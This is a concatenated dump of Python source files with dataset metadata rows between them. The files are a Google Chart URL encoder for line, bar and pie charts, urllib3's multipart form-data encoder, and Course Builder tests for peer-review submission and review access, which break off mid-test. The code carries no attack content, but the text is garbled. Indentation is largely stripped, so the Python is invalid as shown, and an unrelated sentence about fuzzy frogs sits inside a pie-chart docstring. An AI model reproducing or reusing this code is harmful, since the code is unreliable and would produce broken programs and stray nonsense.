y_min, y_max = chart.GetDependentAxis().min, chart.GetDependentAxis().max
series_data = []
markers = []
for i, series in enumerate(chart.data):
data = series.data
if not data: # Drop empty series.
continue
series_data.append(data)
for x, marker in series.markers:
args = [marker.shape, marker.color, i, x, marker.size]
markers.append(','.join(str(arg) for arg in args))
encoder = self._GetDataEncoder(chart)
result = util.EncodeData(chart, series_data, y_min, y_max, encoder)
result.update(util.JoinLists(marker = markers))
return result
def _GetColors(self, chart):
"""Color series color parameter."""
colors = []
for series in chart.data:
if not series.data:
continue
colors.append(series.style.color)
return util.JoinLists(color = colors)
def _GetDataEncoder(self, chart):
"""Get a class which can encode the data the way the user requested."""
if not self.enhanced_encoding:
return util.SimpleDataEncoder()
return util.EnhancedDataEncoder()
def _GetLegendParams(self, chart):
"""Get params for showing a legend."""
if chart._show_legend:
return util.JoinLists(data_series_label = chart._legend_labels)
return {}
def _GetAxisLabelsAndPositions(self, axis, chart):
"""Return axis.labels & axis.label_positions."""
return axis.labels, axis.label_positions
def _GetAxisParams(self, chart):
"""Collect params related to our various axes (x, y, right-hand)."""
axis_types = []
axis_ranges = []
axis_labels = []
axis_label_positions = []
axis_label_gridlines = []
mark_length = max(self._width, self._height)
for i, axis_pair in enumerate(a for a in chart._GetAxes() if a[1].labels):
axis_type_code, axis = axis_pair
axis_types.append(axis_type_code)
if axis.min is not None or axis.max is not None:
assert axis.min is not None # Sanity check: both min & max must be set.
assert axis.max is not None
axis_ranges.append('%s,%s,%s' % (i, axis.min, axis.max))
labels, positions = self._GetAxisLabelsAndPositions(axis, chart)
if labels:
axis_labels.append('%s:' % i)
axis_labels.extend(labels)
if positions:
positions = [i] + list(positions)
axis_label_positions.append(','.join(str(x) for x in positions))
if axis.label_gridlines:
axis_label_gridlines.append("%d,%d" % (i, -mark_length))
return util.JoinLists(axis_type = axis_types,
axis_range = axis_ranges,
axis_label = axis_labels,
axis_position = axis_label_positions,
axis_tick_marks = axis_label_gridlines,
)
def _GetGridParams(self, chart):
"""Collect params related to grid lines."""
x = 0
y = 0
if chart.bottom.grid_spacing:
# min/max must be set for this to make sense.
assert(chart.bottom.min is not None)
assert(chart.bottom.max is not None)
total = float(chart.bottom.max - chart.bottom.min)
x = 100 * chart.bottom.grid_spacing / total
if chart.left.grid_spacing:
# min/max must be set for this to make sense.
assert(chart.left.min is not None)
assert(chart.left.max is not None)
total = float(chart.left.max - chart.left.min)
y = 100 * chart.left.grid_spacing / total
if x or y:
return dict(grid = '%.3g,%.3g,1,0' % (x, y))
return {}
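  # Worked example for _GetGridParams (illustrative): with bottom.min = 0,
  # bottom.max = 100 and bottom.grid_spacing = 20, x = 100 * 20 / 100 = 20 and
  # the result is {'grid': '20,0,1,0'}, i.e. a grid line every 20% of the
  # x-axis range.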
class LineChartEncoder(BaseChartEncoder):
"""Helper class to encode LineChart objects into Google Chart URLs."""
def _GetType(self, chart):
return {'chart_type': 'lc'}
def _GetLineStyles(self, chart):
"""Get LineStyle parameters."""
styles = []
for series in chart.data:
style = series.style
if style:
styles.append('%s,%s,%s' % (style.width, style.on, style.off))
else:
# If one style is missing, they must all be missing
# TODO: Add a test for this; throw a more meaningful exception
assert (not styles)
return util.JoinLists(line_style = styles)
def _GetFormatters(self):
out = super(LineChartEncoder, self)._GetFormatters()
out.insert(-2, self._GetLineStyles)
return out
class SparklineEncoder(LineChartEncoder):
"""Helper class to encode Sparkline objects into Google Chart URLs."""
def _GetType(self, chart):
return {'chart_type': 'lfi'}
class BarChartEncoder(BaseChartEncoder):
"""Helper class to encode BarChart objects into Google Chart URLs."""
__STYLE_DEPRECATION = ('BarChart.display.style is deprecated.' +
' Use BarChart.style, instead.')
def __init__(self, chart, style=None):
"""Construct a new BarChartEncoder.
Args:
style: DEPRECATED. Set style on the chart object itself.
"""
super(BarChartEncoder, self).__init__(chart)
if style is not None:
warnings.warn(self.__STYLE_DEPRECATION, DeprecationWarning, stacklevel=2)
chart.style = style
def _GetType(self, chart):
# Vertical Stacked Type
types = {(True, False): 'bvg',
(True, True): 'bvs',
(False, False): 'bhg',
(False, True): 'bhs'}
return {'chart_type': types[(chart.vertical, chart.stacked)]}
def _GetAxisLabelsAndPositions(self, axis, chart):
"""Reverse labels on the y-axis in horizontal bar charts.
(Otherwise the labels come out backwards from what you would expect)
"""
if not chart.vertical and axis == chart.left:
# The left axis of horizontal bar charts needs to have reversed labels
return reversed(axis.labels), reversed(axis.label_positions)
return axis.labels, axis.label_positions
def _GetFormatters(self):
out = super(BarChartEncoder, self)._GetFormatters()
# insert at -2 to allow extra_params to overwrite everything
out.insert(-2, self._ZeroPoint)
out.insert(-2, self._ApplyBarChartStyle)
return out
def _ZeroPoint(self, chart):
"""Get the zero-point if any bars are negative."""
# (Maybe) set the zero point.
min, max = chart.GetDependentAxis().min, chart.GetDependentAxis().max
out = {}
if min < 0:
if max < 0:
out['chp'] = 1
else:
out['chp'] = -min/float(max - min)
return out
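  # Worked example for _ZeroPoint (illustrative): with min = -20 and max = 80,
  # the zero line lands at -(-20) / float(80 - (-20)) = 0.2, so 'chp' is set
  # to 0.2 (20% of the way up the value axis).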
def _ApplyBarChartStyle(self, chart):
"""If bar style is specified, fill in the missing data and apply it."""
# sanity checks
if chart.style is None or not chart.data:
return {}
(bar_thickness, bar_gap, group_gap) = (chart.style.bar_thickness,
chart.style.bar_gap,
chart.style.group_gap)
# Auto-size bar/group gaps
if bar_gap is None and group_gap is not None:
bar_gap = max(0, group_gap / 2)
if not chart.style.use_fractional_gap_spacing:
bar_gap = int(bar_gap)
if group_gap is None and bar_gap is not None:
group_gap = max(0, bar_gap * 2)
# Set bar thickness to auto if it is missing
if bar_thickness is None:
if chart.style.use_fractional_gap_spacing:
bar_thickness = 'r'
else:
bar_thickness = 'a'
else:
# Convert gap sizes to pixels if needed
if chart.style.use_fractional_gap_spacing:
if bar_gap:
bar_gap = int(bar_thickness * bar_gap)
if group_gap:
group_gap = int(bar_thickness * group_gap)
# Build a valid spec; ignore group gap if chart is stacked,
# since there are no groups in that case
spec = [bar_thickness]
if bar_gap is not None:
spec.append(bar_gap)
if group_gap is not None and not chart.stacked:
spec.append(group_gap)
return util.JoinLists(bar_size = spec)
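  # Worked example for _ApplyBarChartStyle (illustrative values, with
  # use_fractional_gap_spacing False): given bar_thickness=10, bar_gap=3 and
  # group_gap unset, group_gap defaults to max(0, 3 * 2) = 6, so the spec
  # becomes [10, 3, 6] for a grouped chart or [10, 3] for a stacked one,
  # since stacked charts have no groups.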
def __GetStyle(self):
warnings.warn(self.__STYLE_DEPRECATION, DeprecationWarning, stacklevel=2)
return self.chart.style
def __SetStyle(self, value):
warnings.warn(self.__STYLE_DEPRECATION, DeprecationWarning, stacklevel=2)
self.chart.style = value
style = property(__GetStyle, __SetStyle, __STYLE_DEPRECATION)
class PieChartEncoder(BaseChartEncoder):
"""Helper class for encoding PieChart objects into Google Chart URLs.
Fuzzy frogs frolic in the forest.
Object Attributes:
is3d: if True, draw a 3d pie chart. Default is False.
"""
def __init__(self, chart, is3d=False, angle=None):
"""Construct a new PieChartEncoder.
Args:
is3d: If True, draw a 3d pie chart. Default is False. If the pie chart
includes multiple pies, is3d must be set to False.
angle: Angle of rotation of the pie chart, in radians.
"""
super(PieChartEncoder, self).__init__(chart)
self.is3d = is3d
    self.angle = angle
def _GetFormatters(self):
"""Add a formatter for the chart angle."""
formatters = super(PieChartEncoder, self)._GetFormatters()
formatters.append(self._GetAngleParams)
return formatters
def _GetType(self, chart):
if len(chart.data) > 1:
if self.is3d:
warnings.warn(
'3d charts with more than one pie not supported; rendering in 2d',
RuntimeWarning, stacklevel=2)
chart_type = 'pc'
else:
if self.is3d:
chart_type = 'p3'
else:
chart_type = 'p'
return {'chart_type': chart_type}
def _GetDataSeriesParams(self, chart):
"""Collect params related to the data series."""
pie_points = []
labels = []
max_val = 1
for pie in chart.data:
points = []
for segment in pie:
if segment:
points.append(segment.size)
max_val = max(max_val, segment.size)
labels.append(segment.label or '')
if points:
pie_points.append(points)
encoder = self._GetDataEncoder(chart)
result = util.EncodeData(chart, pie_points, 0, max_val, encoder)
result.update(util.JoinLists(label=labels))
return result
def _GetColors(self, chart):
if chart._colors:
# Colors were overridden by the user
colors = chart._colors
else:
# Build the list of colors from individual segments
colors = []
for pie in chart.data:
for segment in pie:
if segment and segment.color:
colors.append(segment.color)
return util.JoinLists(color = colors)
def _GetAngleParams(self, chart):
"""If the user specified an angle, add it to the params."""
if self.angle:
return {'chp' : str(self.angle)}
return {}
| apache-2.0 | 1,440,252,435,834,017,500 | 33.418605 | 80 | 0.631081 | false |
vatsalgit/Deep-Learning- | assignment1/data/deep/lib/python3.4/site-packages/pip/_vendor/requests/packages/urllib3/filepost.py | 713 | 2320 | from __future__ import absolute_import
import codecs
from uuid import uuid4
from io import BytesIO
from .packages import six
from .packages.six import b
from .fields import RequestField
writer = codecs.lookup('utf-8')[3]
def choose_boundary():
"""
    Our embarrassingly-simple replacement for mimetools.choose_boundary.
"""
return uuid4().hex
def iter_field_objects(fields):
"""
Iterate over fields.
Supports list of (k, v) tuples and dicts, and lists of
:class:`~urllib3.fields.RequestField`.
"""
if isinstance(fields, dict):
i = six.iteritems(fields)
else:
i = iter(fields)
for field in i:
if isinstance(field, RequestField):
yield field
else:
yield RequestField.from_tuples(*field)
def iter_fields(fields):
"""
.. deprecated:: 1.6
Iterate over fields.
The addition of :class:`~urllib3.fields.RequestField` makes this function
obsolete. Instead, use :func:`iter_field_objects`, which returns
:class:`~urllib3.fields.RequestField` objects.
Supports list of (k, v) tuples and dicts.
"""
if isinstance(fields, dict):
return ((k, v) for k, v in six.iteritems(fields))
return ((k, v) for k, v in fields)
def encode_multipart_formdata(fields, boundary=None):
"""
Encode a dictionary of ``fields`` using the multipart/form-data MIME format.
:param fields:
Dictionary of fields or list of (key, :class:`~urllib3.fields.RequestField`).
:param boundary:
If not specified, then a random boundary will be generated using
:func:`mimetools.choose_boundary`.
"""
body = BytesIO()
if boundary is None:
boundary = choose_boundary()
for field in iter_field_objects(fields):
body.write(b('--%s\r\n' % (boundary)))
writer(body).write(field.render_headers())
data = field.data
if isinstance(data, int):
data = str(data) # Backwards compatibility
if isinstance(data, six.text_type):
writer(body).write(data)
else:
body.write(data)
body.write(b'\r\n')
body.write(b('--%s--\r\n' % (boundary)))
content_type = str('multipart/form-data; boundary=%s' % boundary)
return body.getvalue(), content_type
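# Illustrative usage (not part of the original module; the field names, file
# name and boundary below are made up):
#
#   body, content_type = encode_multipart_formdata(
#       [('username', 'alice'),
#        ('avatar', ('avatar.png', b'<binary data>', 'image/png'))],
#       boundary='formboundary123')
#   # content_type == 'multipart/form-data; boundary=formboundary123'
#
# Each field is rendered between '--formboundary123' delimiters and the body
# is returned as bytes, ready to be sent as a request payload.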
| gpl-3.0 | -6,402,843,337,765,813,000 | 23.680851 | 85 | 0.628879 | false |
Dreizan/csci1200OnlineCourse | tests/functional/controllers_review.py | 5 | 29623 | # coding: utf-8
# Copyright 2013 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for controllers pertaining to peer review assessments."""
__author__ = 'Sean Lip'
import actions
from actions import assert_contains
from actions import assert_does_not_contain
from actions import assert_equals
from controllers import sites
from controllers import utils
from models import config
from models import courses
from models import transforms
# The unit id for the peer review assignment in the default course.
LEGACY_REVIEW_UNIT_ID = 'ReviewAssessmentExample'
def get_review_step_key(response):
"""Returns the review step key in a request query parameter."""
request_query_string = response.request.environ['QUERY_STRING']
return request_query_string[request_query_string.find('key=') + 4:]
def get_review_payload(identifier, is_draft=False):
"""Returns a sample review payload."""
review = transforms.dumps([
{'index': 0, 'type': 'choices', 'value': '0', 'correct': False},
{'index': 1, 'type': 'regex', 'value': identifier, 'correct': True}
])
return {
'answers': review,
'is_draft': 'true' if is_draft else 'false',
}
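# For example (illustrative), get_review_payload('R2for1') returns a dict whose
# 'answers' value is the JSON-encoded two-item review above and whose
# 'is_draft' value is the string 'false'; passing is_draft=True yields 'true',
# which the handlers treat as a saved-but-unsubmitted draft review.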
class PeerReviewControllerTest(actions.TestBase):
"""Test peer review from the Student perspective."""
def test_submit_assignment(self):
"""Test submission of peer-reviewed assignments."""
# Override course.yaml settings by patching app_context.
get_environ_old = sites.ApplicationContext.get_environ
def get_environ_new(self):
environ = get_environ_old(self)
environ['course']['browsable'] = False
return environ
sites.ApplicationContext.get_environ = get_environ_new
email = '[email protected]'
name = 'Test Peer Reviewed Assignment Submission'
submission = transforms.dumps([
{'index': 0, 'type': 'regex', 'value': 'First answer to Q1',
'correct': True},
{'index': 1, 'type': 'choices', 'value': 3, 'correct': False},
{'index': 2, 'type': 'regex', 'value': 'First answer to Q3',
'correct': True},
])
second_submission = transforms.dumps([
{'index': 0, 'type': 'regex', 'value': 'Second answer to Q1',
'correct': True},
{'index': 1, 'type': 'choices', 'value': 3, 'correct': False},
{'index': 2, 'type': 'regex', 'value': 'Second answer to Q3',
'correct': True},
])
# Check that the sample peer-review assignment shows up in the preview
# page.
response = actions.view_preview(self)
assert_contains('Sample peer review assignment', response.body)
assert_does_not_contain('Review peer assignments', response.body)
actions.login(email)
actions.register(self, name)
# Check that the sample peer-review assignment shows up in the course
# page and that it can be visited.
response = actions.view_course(self)
assert_contains('Sample peer review assignment', response.body)
assert_contains('Review peer assignments', response.body)
assert_contains(
'<a href="assessment?name=%s">' % LEGACY_REVIEW_UNIT_ID,
response.body)
assert_contains('<span> Review peer assignments </span>', response.body,
collapse_whitespace=True)
assert_does_not_contain('<a href="reviewdashboard', response.body,
collapse_whitespace=True)
# Check that the progress circle for this assignment is unfilled.
assert_contains(
'progress-notstarted-%s' % LEGACY_REVIEW_UNIT_ID, response.body)
assert_does_not_contain(
'progress-completed-%s' % LEGACY_REVIEW_UNIT_ID, response.body)
# Try to access an invalid assignment.
response = self.get(
'assessment?name=FakeAssessment', expect_errors=True)
assert_equals(response.status_int, 404)
# The student should not be able to see others' reviews because he/she
# has not submitted an assignment yet.
response = self.get('assessment?name=%s' % LEGACY_REVIEW_UNIT_ID)
assert_does_not_contain('Submitted assignment', response.body)
assert_contains('Due date for this assignment', response.body)
assert_does_not_contain('Reviews received', response.body)
# The student should not be able to access the review dashboard because
# he/she has not submitted the assignment yet.
response = self.get(
'reviewdashboard?unit=%s' % LEGACY_REVIEW_UNIT_ID,
expect_errors=True)
assert_contains('You must submit the assignment for', response.body)
# The student submits the assignment.
response = actions.submit_assessment(
self,
LEGACY_REVIEW_UNIT_ID,
{'answers': submission, 'assessment_type': LEGACY_REVIEW_UNIT_ID}
)
assert_contains(
'Thank you for completing this assignment', response.body)
assert_contains('Review peer assignments', response.body)
# The student views the submitted assignment, which has become readonly.
response = self.get('assessment?name=%s' % LEGACY_REVIEW_UNIT_ID)
assert_contains('First answer to Q1', response.body)
assert_contains('Submitted assignment', response.body)
# The student tries to re-submit the same assignment. This should fail.
response = actions.submit_assessment(
self,
LEGACY_REVIEW_UNIT_ID,
{'answers': second_submission,
'assessment_type': LEGACY_REVIEW_UNIT_ID},
presubmit_checks=False
)
assert_contains(
'You have already submitted this assignment.', response.body)
assert_contains('Review peer assignments', response.body)
# The student views the submitted assignment. The new answers have not
# been saved.
response = self.get('assessment?name=%s' % LEGACY_REVIEW_UNIT_ID)
assert_contains('First answer to Q1', response.body)
assert_does_not_contain('Second answer to Q1', response.body)
# The student checks the course page and sees that the progress
# circle for this assignment has been filled, and that the 'Review
# peer assignments' link is now available.
response = actions.view_course(self)
assert_contains(
'progress-completed-%s' % LEGACY_REVIEW_UNIT_ID, response.body)
assert_does_not_contain(
'<span> Review peer assignments </span>', response.body,
collapse_whitespace=True)
assert_contains(
'<a href="reviewdashboard?unit=%s">' % LEGACY_REVIEW_UNIT_ID,
response.body, collapse_whitespace=True)
# The student should also be able to now view the review dashboard.
response = self.get('reviewdashboard?unit=%s' % LEGACY_REVIEW_UNIT_ID)
assert_contains('Assignments for your review', response.body)
assert_contains('Review a new assignment', response.body)
actions.logout()
# Clean up app_context.
sites.ApplicationContext.get_environ = get_environ_old
def test_handling_of_fake_review_step_key(self):
"""Test that bad keys result in the appropriate responses."""
email = '[email protected]'
name = 'Student 1'
submission = transforms.dumps([
{'index': 0, 'type': 'regex', 'value': 'S1-1', 'correct': True},
{'index': 1, 'type': 'choices', 'value': 3, 'correct': False},
{'index': 2, 'type': 'regex', 'value': 'is-S1', 'correct': True},
])
payload = {
'answers': submission, 'assessment_type': LEGACY_REVIEW_UNIT_ID}
actions.login(email)
actions.register(self, name)
actions.submit_assessment(self, LEGACY_REVIEW_UNIT_ID, payload)
actions.view_review(
self, LEGACY_REVIEW_UNIT_ID, 'Fake key',
expected_status_code=404)
actions.logout()
def test_not_enough_assignments_to_allocate(self):
"""Test for the case when there are too few assignments in the pool."""
email = '[email protected]'
name = 'Student 1'
submission = transforms.dumps([
{'index': 0, 'type': 'regex', 'value': 'S1-1', 'correct': True},
{'index': 1, 'type': 'choices', 'value': 3, 'correct': False},
{'index': 2, 'type': 'regex', 'value': 'is-S1', 'correct': True},
])
payload = {
'answers': submission, 'assessment_type': LEGACY_REVIEW_UNIT_ID}
actions.login(email)
actions.register(self, name)
response = actions.submit_assessment(
self, LEGACY_REVIEW_UNIT_ID, payload)
# The student goes to the review dashboard and requests an assignment
# to review -- but there is nothing to review.
response = actions.request_new_review(
self, LEGACY_REVIEW_UNIT_ID, expected_status_code=200)
assert_does_not_contain('Assignment to review', response.body)
assert_contains('Sorry, there are no new submissions ', response.body)
assert_contains('disabled="true"', response.body)
actions.logout()
def test_reviewer_cannot_impersonate_another_reviewer(self):
"""Test that one reviewer cannot use another's review step key."""
email1 = '[email protected]'
name1 = 'Student 1'
submission1 = transforms.dumps([
{'index': 0, 'type': 'regex', 'value': 'S1-1', 'correct': True},
{'index': 1, 'type': 'choices', 'value': 3, 'correct': False},
{'index': 2, 'type': 'regex', 'value': 'is-S1', 'correct': True},
])
payload1 = {
'answers': submission1, 'assessment_type': LEGACY_REVIEW_UNIT_ID}
email2 = '[email protected]'
name2 = 'Student 2'
submission2 = transforms.dumps([
{'index': 0, 'type': 'regex', 'value': 'S2-1', 'correct': True},
{'index': 1, 'type': 'choices', 'value': 3, 'correct': False},
{'index': 2, 'type': 'regex', 'value': 'not-S1', 'correct': True},
])
payload2 = {
'answers': submission2, 'assessment_type': LEGACY_REVIEW_UNIT_ID}
email3 = '[email protected]'
name3 = 'Student 3'
submission3 = transforms.dumps([
{'index': 0, 'type': 'regex', 'value': 'S3-1', 'correct': True},
{'index': 1, 'type': 'choices', 'value': 3, 'correct': False},
{'index': 2, 'type': 'regex', 'value': 'not-S1', 'correct': True},
])
payload3 = {
'answers': submission3, 'assessment_type': LEGACY_REVIEW_UNIT_ID}
# Student 1 submits the assignment.
actions.login(email1)
actions.register(self, name1)
response = actions.submit_assessment(
self, LEGACY_REVIEW_UNIT_ID, payload1)
actions.logout()
# Student 2 logs in and submits the assignment.
actions.login(email2)
actions.register(self, name2)
response = actions.submit_assessment(
self, LEGACY_REVIEW_UNIT_ID, payload2)
# Student 2 requests a review, and is given Student 1's assignment.
response = actions.request_new_review(self, LEGACY_REVIEW_UNIT_ID)
review_step_key_2_for_1 = get_review_step_key(response)
assert_contains('S1-1', response.body)
actions.logout()
# Student 3 logs in, and submits the assignment.
actions.login(email3)
actions.register(self, name3)
response = actions.submit_assessment(
self, LEGACY_REVIEW_UNIT_ID, payload3)
# Student 3 tries to view Student 1's assignment using Student 2's
# review step key, but is not allowed to.
response = actions.view_review(
self, LEGACY_REVIEW_UNIT_ID, review_step_key_2_for_1,
expected_status_code=404)
# Student 3 logs out.
actions.logout()
def test_student_cannot_see_reviews_prematurely(self):
"""Test that students cannot see others' reviews prematurely."""
email = '[email protected]'
name = 'Student 1'
submission = transforms.dumps([
{'index': 0, 'type': 'regex', 'value': 'S1-1', 'correct': True},
{'index': 1, 'type': 'choices', 'value': 3, 'correct': False},
{'index': 2, 'type': 'regex', 'value': 'is-S1', 'correct': True},
])
payload = {
'answers': submission, 'assessment_type': LEGACY_REVIEW_UNIT_ID}
actions.login(email)
actions.register(self, name)
response = actions.submit_assessment(
self, LEGACY_REVIEW_UNIT_ID, payload)
# Student 1 cannot see the reviews for his assignment yet, because he
# has not submitted the two required reviews.
response = self.get('assessment?name=%s' % LEGACY_REVIEW_UNIT_ID)
assert_equals(response.status_int, 200)
assert_contains('Due date for this assignment', response.body)
assert_contains(
'After you have completed the required number of peer reviews',
response.body)
actions.logout()
# pylint: disable-msg=too-many-statements
def test_draft_review_behaviour(self):
"""Test correctness of draft review visibility."""
email1 = '[email protected]'
name1 = 'Student 1'
submission1 = transforms.dumps([
{'index': 0, 'type': 'regex', 'value': 'S1-1', 'correct': True},
{'index': 1, 'type': 'choices', 'value': 3, 'correct': False},
{'index': 2, 'type': 'regex', 'value': 'is-S1', 'correct': True},
])
payload1 = {
'answers': submission1, 'assessment_type': LEGACY_REVIEW_UNIT_ID}
email2 = '[email protected]'
name2 = 'Student 2'
submission2 = transforms.dumps([
{'index': 0, 'type': 'regex', 'value': 'S2-1', 'correct': True},
{'index': 1, 'type': 'choices', 'value': 3, 'correct': False},
{'index': 2, 'type': 'regex', 'value': 'not-S1', 'correct': True},
])
payload2 = {
'answers': submission2, 'assessment_type': LEGACY_REVIEW_UNIT_ID}
email3 = '[email protected]'
name3 = 'Student 3'
submission3 = transforms.dumps([
{'index': 0, 'type': 'regex', 'value': 'S3-1', 'correct': True},
{'index': 1, 'type': 'choices', 'value': 3, 'correct': False},
{'index': 2, 'type': 'regex', 'value': 'not-S1', 'correct': True},
])
payload3 = {
'answers': submission3, 'assessment_type': LEGACY_REVIEW_UNIT_ID}
# Student 1 submits the assignment.
actions.login(email1)
actions.register(self, name1)
response = actions.submit_assessment(
self, LEGACY_REVIEW_UNIT_ID, payload1)
actions.logout()
# Student 2 logs in and submits the assignment.
actions.login(email2)
actions.register(self, name2)
response = actions.submit_assessment(
self, LEGACY_REVIEW_UNIT_ID, payload2)
# Student 2 requests a review, and is given Student 1's assignment.
response = actions.request_new_review(self, LEGACY_REVIEW_UNIT_ID)
review_step_key_2_for_1 = get_review_step_key(response)
assert_contains('S1-1', response.body)
# Student 2 saves her review as a draft.
review_2_for_1_payload = get_review_payload(
'R2for1', is_draft=True)
response = actions.submit_review(
self, LEGACY_REVIEW_UNIT_ID, review_step_key_2_for_1,
review_2_for_1_payload)
assert_contains('Your review has been saved.', response.body)
response = self.get('reviewdashboard?unit=%s' % LEGACY_REVIEW_UNIT_ID)
assert_equals(response.status_int, 200)
assert_contains('(Draft)', response.body)
# Student 2's draft is still changeable.
response = actions.view_review(
self, LEGACY_REVIEW_UNIT_ID, review_step_key_2_for_1)
assert_contains('Submit Review', response.body)
response = actions.submit_review(
self, LEGACY_REVIEW_UNIT_ID, review_step_key_2_for_1,
review_2_for_1_payload)
assert_contains('Your review has been saved.', response.body)
# Student 2 logs out.
actions.logout()
# Student 3 submits the assignment.
actions.login(email3)
actions.register(self, name3)
response = actions.submit_assessment(
self, LEGACY_REVIEW_UNIT_ID, payload3)
actions.logout()
# Student 1 logs in and requests two assignments to review.
actions.login(email1)
response = self.get('/reviewdashboard?unit=%s' % LEGACY_REVIEW_UNIT_ID)
response = actions.request_new_review(self, LEGACY_REVIEW_UNIT_ID)
assert_contains('Assignment to review', response.body)
assert_contains('not-S1', response.body)
review_step_key_1_for_someone = get_review_step_key(response)
response = actions.request_new_review(self, LEGACY_REVIEW_UNIT_ID)
assert_contains('Assignment to review', response.body)
assert_contains('not-S1', response.body)
review_step_key_1_for_someone_else = get_review_step_key(response)
response = self.get('reviewdashboard?unit=%s' % LEGACY_REVIEW_UNIT_ID)
assert_equals(response.status_int, 200)
assert_contains('disabled="true"', response.body)
# Student 1 submits both reviews, fulfilling his quota.
review_1_for_other_payload = get_review_payload('R1for')
response = actions.submit_review(
self, LEGACY_REVIEW_UNIT_ID, review_step_key_1_for_someone,
review_1_for_other_payload)
assert_contains(
'Your review has been submitted successfully', response.body)
response = actions.submit_review(
self, LEGACY_REVIEW_UNIT_ID, review_step_key_1_for_someone_else,
review_1_for_other_payload)
assert_contains(
'Your review has been submitted successfully', response.body)
response = self.get('/reviewdashboard?unit=%s' % LEGACY_REVIEW_UNIT_ID)
assert_contains('(Completed)', response.body)
assert_does_not_contain('(Draft)', response.body)
# Although Student 1 has submitted 2 reviews, he cannot view Student
# 2's review because it is still in Draft status.
response = self.get('assessment?name=%s' % LEGACY_REVIEW_UNIT_ID)
assert_equals(response.status_int, 200)
assert_contains(
'You have not received any peer reviews yet.', response.body)
assert_does_not_contain('R2for1', response.body)
# Student 1 logs out.
actions.logout()
# Student 2 submits her review for Student 1's assignment.
actions.login(email2)
response = self.get('review?unit=%s&key=%s' % (
LEGACY_REVIEW_UNIT_ID, review_step_key_2_for_1))
assert_does_not_contain('Submitted review', response.body)
response = actions.submit_review(
self, LEGACY_REVIEW_UNIT_ID, review_step_key_2_for_1,
get_review_payload('R2for1'))
assert_contains(
'Your review has been submitted successfully', response.body)
# Her review is now read-only.
response = self.get('review?unit=%s&key=%s' % (
LEGACY_REVIEW_UNIT_ID, review_step_key_2_for_1))
assert_contains('Submitted review', response.body)
assert_contains('R2for1', response.body)
# Student 2 logs out.
actions.logout()
# Now Student 1 can see the review he has received from Student 2.
actions.login(email1)
response = self.get('assessment?name=%s' % LEGACY_REVIEW_UNIT_ID)
assert_equals(response.status_int, 200)
assert_contains('R2for1', response.body)
def test_independence_of_draft_reviews(self):
"""Test that draft reviews do not interfere with each other."""
email1 = '[email protected]'
name1 = 'Student 1'
submission1 = transforms.dumps([
{'index': 0, 'type': 'regex', 'value': 'S1-1', 'correct': True},
{'index': 1, 'type': 'choices', 'value': 3, 'correct': False},
{'index': 2, 'type': 'regex', 'value': 'is-S1', 'correct': True},
])
payload1 = {
'answers': submission1, 'assessment_type': LEGACY_REVIEW_UNIT_ID}
email2 = '[email protected]'
name2 = 'Student 2'
submission2 = transforms.dumps([
{'index': 0, 'type': 'regex', 'value': 'S2-1', 'correct': True},
{'index': 1, 'type': 'choices', 'value': 3, 'correct': False},
{'index': 2, 'type': 'regex', 'value': 'not-S1', 'correct': True},
])
payload2 = {
'answers': submission2, 'assessment_type': LEGACY_REVIEW_UNIT_ID}
email3 = '[email protected]'
name3 = 'Student 3'
submission3 = transforms.dumps([
{'index': 0, 'type': 'regex', 'value': 'S3-1', 'correct': True},
{'index': 1, 'type': 'choices', 'value': 3, 'correct': False},
{'index': 2, 'type': 'regex', 'value': 'not-S1', 'correct': True},
])
payload3 = {
'answers': submission3, 'assessment_type': LEGACY_REVIEW_UNIT_ID}
# Student 1 submits the assignment.
actions.login(email1)
actions.register(self, name1)
response = actions.submit_assessment(
self, LEGACY_REVIEW_UNIT_ID, payload1)
actions.logout()
# Student 2 logs in and submits the assignment.
actions.login(email2)
actions.register(self, name2)
response = actions.submit_assessment(
self, LEGACY_REVIEW_UNIT_ID, payload2)
actions.logout()
# Student 3 logs in and submits the assignment.
actions.login(email3)
actions.register(self, name3)
response = actions.submit_assessment(
self, LEGACY_REVIEW_UNIT_ID, payload3)
actions.logout()
# Student 1 logs in and requests two assignments to review.
actions.login(email1)
response = self.get('/reviewdashboard?unit=%s' % LEGACY_REVIEW_UNIT_ID)
response = actions.request_new_review(self, LEGACY_REVIEW_UNIT_ID)
assert_equals(response.status_int, 200)
assert_contains('Assignment to review', response.body)
assert_contains('not-S1', response.body)
review_step_key_1_for_someone = get_review_step_key(response)
response = actions.request_new_review(self, LEGACY_REVIEW_UNIT_ID)
assert_equals(response.status_int, 200)
assert_contains('Assignment to review', response.body)
assert_contains('not-S1', response.body)
review_step_key_1_for_someone_else = get_review_step_key(response)
self.assertNotEqual(
review_step_key_1_for_someone, review_step_key_1_for_someone_else)
# Student 1 submits two draft reviews.
response = actions.submit_review(
self, LEGACY_REVIEW_UNIT_ID, review_step_key_1_for_someone,
get_review_payload('R1forFirst', is_draft=True))
assert_contains('Your review has been saved.', response.body)
response = actions.submit_review(
self, LEGACY_REVIEW_UNIT_ID, review_step_key_1_for_someone_else,
get_review_payload('R1forSecond', is_draft=True))
assert_contains('Your review has been saved.', response.body)
# The two draft reviews should still be different when subsequently
# accessed.
response = self.get('review?unit=%s&key=%s' % (
LEGACY_REVIEW_UNIT_ID, review_step_key_1_for_someone))
assert_contains('R1forFirst', response.body)
response = self.get('review?unit=%s&key=%s' % (
LEGACY_REVIEW_UNIT_ID, review_step_key_1_for_someone_else))
assert_contains('R1forSecond', response.body)
# Student 1 logs out.
actions.logout()
class PeerReviewDashboardAdminTest(actions.TestBase):
"""Test peer review dashboard from the Admin perspective."""
def test_add_reviewer(self):
"""Test that admin can add a reviewer, and cannot re-add reviewers."""
email = '[email protected]'
name = 'Test Add Reviewer'
submission = transforms.dumps([
{'index': 0, 'type': 'regex', 'value': 'First answer to Q1',
'correct': True},
{'index': 1, 'type': 'choices', 'value': 3, 'correct': False},
{'index': 2, 'type': 'regex', 'value': 'First answer to Q3',
'correct': True},
])
payload = {
'answers': submission, 'assessment_type': LEGACY_REVIEW_UNIT_ID}
actions.login(email)
actions.register(self, name)
response = actions.submit_assessment(
self, LEGACY_REVIEW_UNIT_ID, payload)
# There is nothing to review on the review dashboard.
response = actions.request_new_review(
self, LEGACY_REVIEW_UNIT_ID, expected_status_code=200)
